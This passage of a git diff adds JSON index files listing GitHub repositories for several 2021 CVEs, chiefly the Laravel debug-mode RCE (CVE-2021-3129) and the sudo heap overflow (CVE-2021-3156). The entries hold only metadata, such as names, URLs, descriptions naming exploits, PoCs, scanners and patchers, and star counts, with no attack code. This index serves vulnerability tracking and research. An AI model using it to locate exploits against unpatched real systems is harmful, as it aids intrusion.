+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 576503076,
+ "name": "Laravel-debug-Checker",
+ "full_name": "MadExploits\/Laravel-debug-Checker",
+ "owner": {
+ "login": "MadExploits",
+ "id": 80827394,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80827394?v=4",
+ "html_url": "https:\/\/github.com\/MadExploits"
+ },
+ "html_url": "https:\/\/github.com\/MadExploits\/Laravel-debug-Checker",
+ "description": "CVE-2021-3129 Exploit Checker By .\/MrMad",
+ "fork": false,
+ "created_at": "2022-12-10T03:32:34Z",
+ "updated_at": "2024-05-19T16:48:32Z",
+ "pushed_at": "2024-03-20T14:21:14Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3129",
+ "laravel-exploit"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 609599518,
+ "name": "CVE-2021-3129-exp",
+ "full_name": "ajisai-babu\/CVE-2021-3129-exp",
+ "owner": {
+ "login": "ajisai-babu",
+ "id": 30685957,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30685957?v=4",
+ "html_url": "https:\/\/github.com\/ajisai-babu"
+ },
+ "html_url": "https:\/\/github.com\/ajisai-babu\/CVE-2021-3129-exp",
+ "description": "Laravel Debug mode RCE漏洞(CVE-2021-3129)poc \/ exp",
+ "fork": false,
+ "created_at": "2023-03-04T17:04:38Z",
+ "updated_at": "2024-04-22T11:52:24Z",
+ "pushed_at": "2023-03-04T17:10:43Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 612652775,
+ "name": "CVE-2021-3129",
+ "full_name": "keyuan15\/CVE-2021-3129",
+ "owner": {
+ "login": "keyuan15",
+ "id": 56430812,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56430812?v=4",
+ "html_url": "https:\/\/github.com\/keyuan15"
+ },
+ "html_url": "https:\/\/github.com\/keyuan15\/CVE-2021-3129",
+ "description": "Laravel RCE CVE-2021-3129",
+ "fork": false,
+ "created_at": "2023-03-11T15:31:37Z",
+ "updated_at": "2024-01-14T10:30:07Z",
+ "pushed_at": "2023-03-11T15:33:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 624319568,
+ "name": "cve-2021-3129",
+ "full_name": "qaisarafridi\/cve-2021-3129",
+ "owner": {
+ "login": "qaisarafridi",
+ "id": 37263794,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37263794?v=4",
+ "html_url": "https:\/\/github.com\/qaisarafridi"
+ },
+ "html_url": "https:\/\/github.com\/qaisarafridi\/cve-2021-3129",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-06T07:56:33Z",
+ "updated_at": "2023-04-06T07:56:33Z",
+ "pushed_at": "2023-04-06T07:56:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 634732295,
+ "name": "CVE-2021-3129",
+ "full_name": "Zoo1sondv\/CVE-2021-3129",
+ "owner": {
+ "login": "Zoo1sondv",
+ "id": 114736274,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114736274?v=4",
+ "html_url": "https:\/\/github.com\/Zoo1sondv"
+ },
+ "html_url": "https:\/\/github.com\/Zoo1sondv\/CVE-2021-3129",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-01T03:20:13Z",
+ "updated_at": "2023-05-01T03:40:47Z",
+ "pushed_at": "2023-06-03T10:12:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 670956112,
+ "name": "CVE-2021-3129",
+ "full_name": "miko550\/CVE-2021-3129",
+ "owner": {
+ "login": "miko550",
+ "id": 83682793,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4",
+ "html_url": "https:\/\/github.com\/miko550"
+ },
+ "html_url": "https:\/\/github.com\/miko550\/CVE-2021-3129",
+ "description": "Laravel RCE (CVE-2021-3129)",
+ "fork": false,
+ "created_at": "2023-07-26T08:05:25Z",
+ "updated_at": "2023-07-26T08:26:35Z",
+ "pushed_at": "2023-07-26T08:43:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 671479775,
+ "name": "CVE-2021-3129",
+ "full_name": "wmasday\/CVE-2021-3129",
+ "owner": {
+ "login": "wmasday",
+ "id": 52761911,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52761911?v=4",
+ "html_url": "https:\/\/github.com\/wmasday"
+ },
+ "html_url": "https:\/\/github.com\/wmasday\/CVE-2021-3129",
+ "description": "CVE-2021-3129 | Laravel Debug Mode Vulnerability",
+ "fork": false,
+ "created_at": "2023-07-27T12:14:01Z",
+ "updated_at": "2023-09-03T00:29:08Z",
+ "pushed_at": "2023-07-27T12:28:49Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 708424437,
+ "name": "Mass-CVE-2021-3129-Scanner",
+ "full_name": "banyaksepuh\/Mass-CVE-2021-3129-Scanner",
+ "owner": {
+ "login": "banyaksepuh",
+ "id": 113920644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113920644?v=4",
+ "html_url": "https:\/\/github.com\/banyaksepuh"
+ },
+ "html_url": "https:\/\/github.com\/banyaksepuh\/Mass-CVE-2021-3129-Scanner",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-22T14:25:38Z",
+ "updated_at": "2023-10-22T14:35:06Z",
+ "pushed_at": "2023-10-22T14:41:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 743409236,
+ "name": "CVE-2021-3129",
+ "full_name": "Axianke\/CVE-2021-3129",
+ "owner": {
+ "login": "Axianke",
+ "id": 60959602,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60959602?v=4",
+ "html_url": "https:\/\/github.com\/Axianke"
+ },
+ "html_url": "https:\/\/github.com\/Axianke\/CVE-2021-3129",
+ "description": "CVE-2021-3129",
+ "fork": false,
+ "created_at": "2024-01-15T07:12:07Z",
+ "updated_at": "2024-03-04T10:12:53Z",
+ "pushed_at": "2024-01-15T07:15:00Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803011028,
+ "name": "CVE-2021-3129",
+ "full_name": "cc3305\/CVE-2021-3129",
+ "owner": {
+ "login": "cc3305",
+ "id": 103961201,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4",
+ "html_url": "https:\/\/github.com\/cc3305"
+ },
+ "html_url": "https:\/\/github.com\/cc3305\/CVE-2021-3129",
+ "description": "A exploit script for CVE-2021-3129",
+ "fork": false,
+ "created_at": "2024-05-19T21:25:25Z",
+ "updated_at": "2024-06-19T16:40:05Z",
+ "pushed_at": "2024-06-19T16:40:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31290.json b/2021/CVE-2021-31290.json
new file mode 100644
index 0000000000..3424450d4f
--- /dev/null
+++ b/2021/CVE-2021-31290.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 624319893,
+ "name": "cve-2021-31290",
+ "full_name": "qaisarafridi\/cve-2021-31290",
+ "owner": {
+ "login": "qaisarafridi",
+ "id": 37263794,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37263794?v=4",
+ "html_url": "https:\/\/github.com\/qaisarafridi"
+ },
+ "html_url": "https:\/\/github.com\/qaisarafridi\/cve-2021-31290",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-06T07:57:29Z",
+ "updated_at": "2023-04-06T07:58:00Z",
+ "pushed_at": "2023-04-06T07:57:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3130.json b/2021/CVE-2021-3130.json
new file mode 100644
index 0000000000..ad31eb5a25
--- /dev/null
+++ b/2021/CVE-2021-3130.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 331557374,
+ "name": "CVE-2021-3130",
+ "full_name": "jet-pentest\/CVE-2021-3130",
+ "owner": {
+ "login": "jet-pentest",
+ "id": 71512502,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4",
+ "html_url": "https:\/\/github.com\/jet-pentest"
+ },
+ "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-3130",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-21T08:04:32Z",
+ "updated_at": "2021-02-14T09:24:07Z",
+ "pushed_at": "2021-01-21T12:31:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3131.json b/2021/CVE-2021-3131.json
new file mode 100644
index 0000000000..7f287ed243
--- /dev/null
+++ b/2021/CVE-2021-3131.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 329230328,
+ "name": "CVE-2021-3131",
+ "full_name": "jet-pentest\/CVE-2021-3131",
+ "owner": {
+ "login": "jet-pentest",
+ "id": 71512502,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4",
+ "html_url": "https:\/\/github.com\/jet-pentest"
+ },
+ "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-3131",
+ "description": "CVE-2021-3131",
+ "fork": false,
+ "created_at": "2021-01-13T07:41:25Z",
+ "updated_at": "2022-12-19T10:01:54Z",
+ "pushed_at": "2021-01-13T07:54:38Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3138.json b/2021/CVE-2021-3138.json
new file mode 100644
index 0000000000..1f0b75593f
--- /dev/null
+++ b/2021/CVE-2021-3138.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 329132844,
+ "name": "CVE-2021-3138",
+ "full_name": "Mesh3l911\/CVE-2021-3138",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-3138",
+ "description": "Discource POC",
+ "fork": false,
+ "created_at": "2021-01-12T22:50:27Z",
+ "updated_at": "2021-05-04T19:08:13Z",
+ "pushed_at": "2021-05-04T19:08:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3156.json b/2021/CVE-2021-3156.json
new file mode 100644
index 0000000000..feb43203a7
--- /dev/null
+++ b/2021/CVE-2021-3156.json
@@ -0,0 +1,2185 @@
+[
+ {
+ "id": 333199828,
+ "name": "CVE-2021-3156",
+ "full_name": "mr-r3b00t\/CVE-2021-3156",
+ "owner": {
+ "login": "mr-r3b00t",
+ "id": 14963690,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4",
+ "html_url": "https:\/\/github.com\/mr-r3b00t"
+ },
+ "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-26T19:53:04Z",
+ "updated_at": "2023-09-28T11:24:21Z",
+ "pushed_at": "2021-01-26T20:09:53Z",
+ "stargazers_count": 35,
+ "watchers_count": 35,
+ "has_discussions": false,
+ "forks_count": 32,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 32,
+ "watchers": 35,
+ "score": 0,
+ "subscribers_count": 10
+ },
+ {
+ "id": 333450928,
+ "name": "sudo_cve-2021-3156",
+ "full_name": "nexcess\/sudo_cve-2021-3156",
+ "owner": {
+ "login": "nexcess",
+ "id": 651829,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/651829?v=4",
+ "html_url": "https:\/\/github.com\/nexcess"
+ },
+ "html_url": "https:\/\/github.com\/nexcess\/sudo_cve-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-27T14:40:57Z",
+ "updated_at": "2023-02-28T06:13:14Z",
+ "pushed_at": "2021-01-27T18:21:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 18
+ },
+ {
+ "id": 333483141,
+ "name": "CVE-2021-3156",
+ "full_name": "reverse-ex\/CVE-2021-3156",
+ "owner": {
+ "login": "reverse-ex",
+ "id": 77421345,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77421345?v=4",
+ "html_url": "https:\/\/github.com\/reverse-ex"
+ },
+ "html_url": "https:\/\/github.com\/reverse-ex\/CVE-2021-3156",
+ "description": "CVE-2021-3156",
+ "fork": false,
+ "created_at": "2021-01-27T16:03:34Z",
+ "updated_at": "2023-09-28T11:24:23Z",
+ "pushed_at": "2021-01-31T04:56:56Z",
+ "stargazers_count": 112,
+ "watchers_count": 112,
+ "has_discussions": false,
+ "forks_count": 43,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 43,
+ "watchers": 112,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 333492305,
+ "name": "CVE-2021-3156",
+ "full_name": "unauth401\/CVE-2021-3156",
+ "owner": {
+ "login": "unauth401",
+ "id": 61272656,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61272656?v=4",
+ "html_url": "https:\/\/github.com\/unauth401"
+ },
+ "html_url": "https:\/\/github.com\/unauth401\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-27T16:35:43Z",
+ "updated_at": "2023-09-28T11:24:23Z",
+ "pushed_at": "2021-01-27T15:19:23Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 25,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 25,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 333557918,
+ "name": "CVE-2021-3156",
+ "full_name": "ymrsmns\/CVE-2021-3156",
+ "owner": {
+ "login": "ymrsmns",
+ "id": 25608325,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25608325?v=4",
+ "html_url": "https:\/\/github.com\/ymrsmns"
+ },
+ "html_url": "https:\/\/github.com\/ymrsmns\/CVE-2021-3156",
+ "description": "CVE-2021-3156",
+ "fork": false,
+ "created_at": "2021-01-27T20:57:00Z",
+ "updated_at": "2021-01-31T13:08:37Z",
+ "pushed_at": "2021-01-31T13:08:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 333569622,
+ "name": "CVE-2021-3156-PATCHER",
+ "full_name": "elbee-cyber\/CVE-2021-3156-PATCHER",
+ "owner": {
+ "login": "elbee-cyber",
+ "id": 66045908,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66045908?v=4",
+ "html_url": "https:\/\/github.com\/elbee-cyber"
+ },
+ "html_url": "https:\/\/github.com\/elbee-cyber\/CVE-2021-3156-PATCHER",
+ "description": "This simple bash script will patch the recently discovered sudo heap overflow vulnerability.",
+ "fork": false,
+ "created_at": "2021-01-27T21:49:06Z",
+ "updated_at": "2023-08-28T18:21:53Z",
+ "pushed_at": "2021-01-28T05:25:26Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 333619288,
+ "name": "CVE-2021-3156-Baron-Samedit",
+ "full_name": "kernelzeroday\/CVE-2021-3156-Baron-Samedit",
+ "owner": {
+ "login": "kernelzeroday",
+ "id": 11334159,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11334159?v=4",
+ "html_url": "https:\/\/github.com\/kernelzeroday"
+ },
+ "html_url": "https:\/\/github.com\/kernelzeroday\/CVE-2021-3156-Baron-Samedit",
+ "description": "1day research effort",
+ "fork": false,
+ "created_at": "2021-01-28T02:13:49Z",
+ "updated_at": "2021-06-23T04:08:28Z",
+ "pushed_at": "2021-01-29T03:21:13Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 333620703,
+ "name": "cve-2021-3156",
+ "full_name": "yaunsky\/cve-2021-3156",
+ "owner": {
+ "login": "yaunsky",
+ "id": 48243087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4",
+ "html_url": "https:\/\/github.com\/yaunsky"
+ },
+ "html_url": "https:\/\/github.com\/yaunsky\/cve-2021-3156",
+ "description": "cve-2021-3156;sudo堆溢出漏洞;漏洞检测",
+ "fork": false,
+ "created_at": "2021-01-28T02:20:24Z",
+ "updated_at": "2022-11-12T19:46:49Z",
+ "pushed_at": "2021-01-28T02:21:30Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 333700525,
+ "name": "CVE-2021-3156-Exp",
+ "full_name": "baka9moe\/CVE-2021-3156-Exp",
+ "owner": {
+ "login": "baka9moe",
+ "id": 17043012,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17043012?v=4",
+ "html_url": "https:\/\/github.com\/baka9moe"
+ },
+ "html_url": "https:\/\/github.com\/baka9moe\/CVE-2021-3156-Exp",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-28T08:55:04Z",
+ "updated_at": "2021-05-14T12:43:48Z",
+ "pushed_at": "2021-01-28T09:12:29Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 333714882,
+ "name": "CVE-2021-3156",
+ "full_name": "ph4ntonn\/CVE-2021-3156",
+ "owner": {
+ "login": "ph4ntonn",
+ "id": 45198234,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45198234?v=4",
+ "html_url": "https:\/\/github.com\/ph4ntonn"
+ },
+ "html_url": "https:\/\/github.com\/ph4ntonn\/CVE-2021-3156",
+ "description": "CVE-2021-3156",
+ "fork": false,
+ "created_at": "2021-01-28T09:52:55Z",
+ "updated_at": "2021-01-29T00:08:11Z",
+ "pushed_at": "2021-01-28T10:02:05Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-3156"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 334027841,
+ "name": "CVE-2021-3156-SCRIPT",
+ "full_name": "binw2018\/CVE-2021-3156-SCRIPT",
+ "owner": {
+ "login": "binw2018",
+ "id": 49139970,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49139970?v=4",
+ "html_url": "https:\/\/github.com\/binw2018"
+ },
+ "html_url": "https:\/\/github.com\/binw2018\/CVE-2021-3156-SCRIPT",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-29T03:34:31Z",
+ "updated_at": "2021-02-03T10:32:24Z",
+ "pushed_at": "2021-01-29T06:49:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 334128649,
+ "name": "CVE-2021-3156",
+ "full_name": "freeFV\/CVE-2021-3156",
+ "owner": {
+ "login": "freeFV",
+ "id": 32540878,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32540878?v=4",
+ "html_url": "https:\/\/github.com\/freeFV"
+ },
+ "html_url": "https:\/\/github.com\/freeFV\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-29T11:44:37Z",
+ "updated_at": "2021-04-29T12:50:44Z",
+ "pushed_at": "2021-01-29T11:36:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 334242353,
+ "name": "CVE-2021-3156",
+ "full_name": "mbcrump\/CVE-2021-3156",
+ "owner": {
+ "login": "mbcrump",
+ "id": 534885,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/534885?v=4",
+ "html_url": "https:\/\/github.com\/mbcrump"
+ },
+ "html_url": "https:\/\/github.com\/mbcrump\/CVE-2021-3156",
+ "description": "Notes regarding CVE-2021-3156: Heap-Based Buffer Overflow in Sudo",
+ "fork": false,
+ "created_at": "2021-01-29T19:24:41Z",
+ "updated_at": "2024-01-04T16:54:21Z",
+ "pushed_at": "2021-01-31T02:21:37Z",
+ "stargazers_count": 39,
+ "watchers_count": 39,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3156",
+ "linux",
+ "wsl"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 39,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 334318140,
+ "name": "CVE-2021-3156",
+ "full_name": "stong\/CVE-2021-3156",
+ "owner": {
+ "login": "stong",
+ "id": 14918218,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14918218?v=4",
+ "html_url": "https:\/\/github.com\/stong"
+ },
+ "html_url": "https:\/\/github.com\/stong\/CVE-2021-3156",
+ "description": "PoC for CVE-2021-3156 (sudo heap overflow)",
+ "fork": false,
+ "created_at": "2021-01-30T03:22:04Z",
+ "updated_at": "2024-06-11T00:50:47Z",
+ "pushed_at": "2022-04-14T11:51:18Z",
+ "stargazers_count": 430,
+ "watchers_count": 430,
+ "has_discussions": false,
+ "forks_count": 111,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 111,
+ "watchers": 430,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 334390097,
+ "name": "CVE-2021-3156",
+ "full_name": "nobodyatall648\/CVE-2021-3156",
+ "owner": {
+ "login": "nobodyatall648",
+ "id": 35725871,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4",
+ "html_url": "https:\/\/github.com\/nobodyatall648"
+ },
+ "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2021-3156",
+ "description": "checking CVE-2021-3156 vulnerability & patch script",
+ "fork": false,
+ "created_at": "2021-01-30T10:53:26Z",
+ "updated_at": "2024-01-17T14:12:38Z",
+ "pushed_at": "2021-02-01T02:19:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 334506851,
+ "name": "CVE-2021-3156",
+ "full_name": "blasty\/CVE-2021-3156",
+ "owner": {
+ "login": "blasty",
+ "id": 101374,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101374?v=4",
+ "html_url": "https:\/\/github.com\/blasty"
+ },
+ "html_url": "https:\/\/github.com\/blasty\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-30T20:39:58Z",
+ "updated_at": "2024-06-24T05:35:44Z",
+ "pushed_at": "2021-02-02T17:07:09Z",
+ "stargazers_count": 930,
+ "watchers_count": 930,
+ "has_discussions": false,
+ "forks_count": 235,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 235,
+ "watchers": 930,
+ "score": 0,
+ "subscribers_count": 27
+ },
+ {
+ "id": 334565393,
+ "name": "CVE-2021-3156",
+ "full_name": "teamtopkarl\/CVE-2021-3156",
+ "owner": {
+ "login": "teamtopkarl",
+ "id": 18065690,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18065690?v=4",
+ "html_url": "https:\/\/github.com\/teamtopkarl"
+ },
+ "html_url": "https:\/\/github.com\/teamtopkarl\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-31T03:38:37Z",
+ "updated_at": "2023-09-06T17:57:12Z",
